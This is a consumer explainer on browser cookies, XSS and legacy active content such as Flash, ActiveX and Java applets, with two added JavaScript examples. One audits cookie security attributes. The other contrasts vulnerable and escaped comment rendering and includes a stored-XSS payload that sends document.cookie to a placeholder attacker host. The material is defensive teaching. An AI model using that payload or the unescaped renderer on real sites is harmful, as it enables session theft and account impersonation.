As we boldly go into a new era of web design and development, websites are no longer the static pages of yesteryear.
We demand the ability to comment, to customize, to log in, to share with our friends. We demand polished visual elements that dazzle on all devices: drop-down menus, high-resolution splash screens, customizable interfaces and more.
With all these elements comes active content, the true driving force of today’s web. Sites today rely on scripts and web application frameworks, and with this greater power comes greater potential for abuse. (Sorry fans, Spider-Man quote denied.)
So, here’s what you need to know about cookies and active content.
##What Is A Cookie, Anyway?##
A cookie is a small piece of text that a website asks your browser to store and send back with every later request to that site. It is the site’s server, not your computer, that decides what goes into it. Most often that is a random session identifier which tells the server that a request belongs to you (and, once you have logged in, to your account); it may also hold preferences such as language or currency. Details like the browser you’re using, the operating system you’re running and your IP address are visible to the site from the request itself, and a site may record them against your cookie on its own servers, but they are rarely stored in the cookie.
Tracking cookies, typically set by advertising networks embedded in many different sites, carry an identifier that lets the network recognise you from site to site and build up a record of when you last visited, which search brought you there, and other information used for marketing and analytics.
Cookies are so common that you’ll come across hundreds – even thousands – per day, all collected in the background. These cookies come in two main flavors:
- Session cookies: set without an expiry date. They hold information about your current visit, such as the identifier that keeps you logged in as you move from page to page, and the browser discards them when it closes.
- Persistent cookies: set with an Expires or Max-Age attribute and kept on disk until that time, even across browser restarts. When you ask a site to “remember you” and it logs you in automatically on your next visit, a persistent cookie is doing the work.
If an attacker can read your cookies, whether by copying the browser’s cookie store off your disk or by stealing them from a web page, they learn which sites you use, how much time you spend on them and which bank you hold an account with. Worse, a stolen session cookie lets them impersonate you: presenting it to the site is as good as logging in, and no password is needed.
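As an added example (not code from the original article), the following script shows what the two flavours look like on the wire and which attributes decide how much damage a stolen cookie can do. It parses a handful of constructed Set-Cookie headers, classifies each as session or persistent using the RFC 6265 rule that only Max-Age or Expires makes a cookie persistent, and flags cookies missing the Secure, HttpOnly and SameSite attributes. The cookie names and values are invented sample input.

```javascript
// Added example: classify Set-Cookie headers as session or persistent and
// flag the hardening attributes that limit what a thief can do with them.
// All header strings below are constructed sample input, not real sites.
const SAMPLE_SET_COOKIE_HEADERS = [
  // Session cookie: no Expires/Max-Age, so it lasts until the browser closes.
  // Secure + HttpOnly + SameSite: only sent over HTTPS, invisible to
  // document.cookie, and not attached to cross-site requests.
  "sid=3f9a1c; Path=/; Secure; HttpOnly; SameSite=Lax",
  // Persistent "remember me" cookie: Max-Age keeps it for 30 days.
  "remember=ab12cd; Path=/; Max-Age=2592000; Secure; HttpOnly; SameSite=Strict",
  // Persistent tracking cookie, kept for years with no protection at all.
  "_trk=user-8812; Expires=Wed, 01 Jan 2027 00:00:00 GMT; Path=/",
];

// Split "name=value; Attr; Attr=val" into its parts. Attribute names are
// case-insensitive, so they are lowercased; valueless attributes become true.
function parseSetCookie(header) {
  const [pair, ...attrParts] = header.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const name = eq === -1 ? pair : pair.slice(0, eq);
  const value = eq === -1 ? "" : pair.slice(eq + 1);
  const attrs = {};
  for (const part of attrParts) {
    if (!part) continue;
    const i = part.indexOf("=");
    const key = (i === -1 ? part : part.slice(0, i)).toLowerCase();
    attrs[key] = i === -1 ? true : part.slice(i + 1);
  }
  return { name, value, attrs };
}

function classifyCookie(header) {
  const { name, attrs } = parseSetCookie(header);
  // RFC 6265: a cookie is persistent iff it carries Max-Age or Expires;
  // Max-Age takes precedence when both are present.
  let lifetime = "session";
  if ("max-age" in attrs) {
    lifetime = `persistent (${attrs["max-age"]} s)`;
  } else if ("expires" in attrs) {
    lifetime = `persistent (until ${attrs.expires})`;
  }
  const findings = [];
  if (!attrs.secure) findings.push("missing Secure: sent over plain HTTP");
  if (!attrs.httponly) findings.push("missing HttpOnly: readable by page scripts");
  if (!attrs.samesite) findings.push("missing SameSite: sent on cross-site requests");
  return { name, lifetime, persistent: lifetime !== "session", findings };
}

function auditCookies(headers) {
  return headers.map(classifyCookie);
}

for (const r of auditCookies(SAMPLE_SET_COOKIE_HEADERS)) {
  const detail = r.findings.length ? `\n  - ${r.findings.join("\n  - ")}` : "";
  console.log(`${r.name}: ${r.lifetime}${detail}`);
}
```

Run it with `node` and the third cookie is the one to worry about: it outlives the browser session by years and, lacking HttpOnly, any script that runs in the page can read it. Real audits pull these headers from the browser’s developer tools (Network tab) or from `curl -i`.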
##What’s Active Content?##
Many visual elements such as drop-down menus, splash pages and sliding banners rely on web scripts to operate. Entire sites, like Facebook, are simply giant web applications that run a multitude of scripts all at once.
The main player in active content, JavaScript, is now a major life force of the web and allows for easy creation of great-looking web applications, forms and sites. It’s a ubiquitous and powerful language, providing an amazing amount of functionality and support for web creators.
However, it’s for this reason that it’s so often a target. When a site fails to treat user-supplied data as data, an attacker can inject their own JavaScript into its pages, a flaw known as cross-site scripting (XSS). Script injected this way runs in your browser with the site’s full privileges: it can rewrite forms so that they submit to the attacker, send you to malicious sites, read any cookie not protected with the HttpOnly flag, and perform actions on the site as if it were you.
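The pattern behind that paragraph, as an added example rather than code from the original article: a comment is rendered into a page by string concatenation (vulnerable) and, beside it, by escaping first (hardened). The comment text is constructed, and `attacker.example` is a placeholder hostname, not a real site.

```javascript
// Added example: stored cross-site scripting, vulnerable and hardened.
// ATTACKER_COMMENT is constructed sample input; attacker.example is a placeholder.
const ATTACKER_COMMENT =
  'Nice post!<script>new Image().src="https://attacker.example/c?"+document.cookie</script>';

// Vulnerable: user input is dropped straight into the markup, so the browser
// parses the injected <script> as part of the page and runs it with the
// site's origin. document.cookie then hands over every cookie not marked HttpOnly.
function renderCommentVulnerable(comment) {
  return `<li class="comment">${comment}</li>`;
}

// Hardened: escape the five HTML metacharacters so the input can only ever
// be text, never markup. Real templating engines do this by default; the
// bug is usually someone bypassing that default with raw/unescaped output.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#39;",
  })[c]);
}

function renderCommentSafe(comment) {
  return `<li class="comment">${escapeHtml(comment)}</li>`;
}

// Does the rendered fragment contain a live <script> element? A crude check,
// but sufficient to show the difference between the two renderers.
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

console.log("vulnerable:", renderCommentVulnerable(ATTACKER_COMMENT));
console.log("hardened:  ", renderCommentSafe(ATTACKER_COMMENT));
```

Note what HttpOnly does and does not buy you here: it stops the injected script reading the session cookie, but the script still runs as you and can submit forms or fetch pages on your behalf, which is why escaping output is the fix and HttpOnly is only a backstop.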
Other forms of active content allow your browser to show you videos within webpages (think YouTube, Vimeo, and other video streaming sites). These videos often make use of a plugin within your browser, such as Adobe Flash Player. However, they’re increasingly moving towards HTML5, which does not require a special plugin.
In particular, Adobe Flash has suffered from numerous security flaws and zero days, allowing attackers to execute malicious code on a user’s computer via the Flash browser plugin, often simply by getting them to load a page or an advert that embeds a booby-trapped Flash file. While larger streaming sites moved away from it, many smaller video hosting sites kept using Flash, which is why it pays to run the latest version of anything you do install. Adobe ended support for Flash at the end of 2020 and current browsers no longer load it, so a site that still demands Flash is a reason to leave, not a reason to install anything.
ActiveX and Java applets are older kinds of active content that a browser could download and run automatically. ActiveX controls (Internet Explorer only) are native code that runs with the full privileges of the logged-in user; Java applets ran inside a sandbox that was frequently escaped. Examples include viewing PDF or Word documents in the browser without downloading the file, or using interactive educational simulations written in Java via a web interface.
A digital signature on such content tells you who published it; it does not make the code safe. Even signed controls and applets from reputable companies have shipped with exploitable bugs, and unsigned or third-party active content is a favourite route to taking over a computer outright: installing malware and keyloggers, stealing data and more.
##Staying Safe##
It’s important to remember that active content and cookies are not inherently dangerous. In fact, they’re an essential part of the web. In some sense, it’s almost impossible to avoid them, so being aware of their power is the biggest way to keep your data safe.
While it’s possible to completely disable cookies and active content in your browser, doing so will render many of your favourite sites unusable. Instead, practice caution and set your browser to ask whether you wish to run active content such as plugins. Regularly clearing your cookies rids you of persistent tracker cookies from various ad networks, though bear in mind that it also signs you out of every site.
If you’re running Java on your machine, make sure it is up to date; most attacks rely on exploiting obsolete versions of its browser plugin. When visiting a site you’re not familiar with, take the precaution of disabling active content in your browser.
Don’t forget about email, too: an HTML message is a web page, and your email client renders it with a browser engine. Most modern clients refuse to run scripts in mail, but they will still fetch remote images and other content unless told not to, which lets a sender learn when and from where you opened a message, and link text can read as one address while pointing somewhere else. Where possible, choose to view your messages as plain text, or at least block remote content, to resolve these issues.